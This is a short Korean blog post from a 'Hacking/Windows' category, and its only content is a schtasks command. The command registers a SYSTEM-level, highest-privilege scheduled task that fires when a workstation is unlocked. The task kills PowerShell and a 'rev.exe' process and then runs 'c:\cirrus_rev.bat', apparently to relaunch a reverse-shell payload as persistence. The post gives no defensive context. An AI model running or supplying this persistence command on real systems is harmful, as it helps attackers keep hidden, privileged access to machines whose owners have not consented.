본문 바로가기

Hacking/Windows

[Windows] schtask 사용법

schtasks /RU "NT Authority\SYSTEM" /Create /SC ONEVENT /MO "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4801]]" /EC Security /TN "cirruslogon" /TR "cmd /c (taskkill /F /IM powershell.exe rev.exe) & c:\cirrus_rev.bat" /F /RL highest


'Hacking > Windows' 카테고리의 다른 글

DDE, DDEAUTO Attack with powershell  (0) 2017.10.31
[WMI] 실행중인 프로그램의 실행옵션 보기  (0) 2015.09.17
Active Directory login하기  (0) 2015.09.10